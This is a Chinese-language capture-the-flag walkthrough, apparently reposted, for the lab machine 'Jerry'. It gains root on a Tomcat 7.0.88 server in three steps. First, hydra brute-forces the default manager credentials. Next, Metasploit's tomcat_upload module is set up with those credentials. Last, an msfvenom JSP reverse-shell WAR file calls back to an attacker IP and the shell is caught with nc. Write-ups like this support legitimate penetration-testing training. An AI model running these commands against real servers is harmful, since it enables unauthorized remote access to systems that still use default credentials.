栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 软件开发 > 后端开发 > Java

Jerry

Java 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

Jerry

Jerry
    • 靶机信息
    • 信息收集
    • 漏洞利用
      • MSF获取权限
      • NC反弹shell

靶机信息

信息收集

我们可以看到,目标主机只开放了8080端口,而且版本还是7.0.88的

我们立马登录tomcat页面,并且尝试账户和密码都是admin,看看能不能登录成功,结果是失败的。

漏洞利用

我们下载seclists这个工具,对tomcat的默认用户名和密码进行暴力破解

我们使用hydra工具对账号密码进行破解,发现账号是tomcat,密码是s3cret

hydra -C /usr/share/seclists/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt http://10.10.10.95:8080/manager/html

MSF获取权限
search tomcat_mgr
use exploit/multi/http/tomcat_upload
show options
set rhosts 10.10.10.95
set lhost 10.10.14.11
set httpusername tomcat
set httppassword s3cret
set rport 8080
exploit


我们获取一个shell,发现已经是最高权限了

那么我们就可以查看到flag值了

NC反弹shell

首先我们先准备一个木马

msfvenom -p java/jsp_shell_reverse_tcp lhost=10.10.14.11 lport=1234 -f war > shell.war


我们使用账号密码登录进部署页面,并将生成的木马部署进tomcat服务器上

然后我们启动nc进行监听,并且在浏览器上浏览我们刚刚上传的war包,反弹shell成功。

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/349009.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号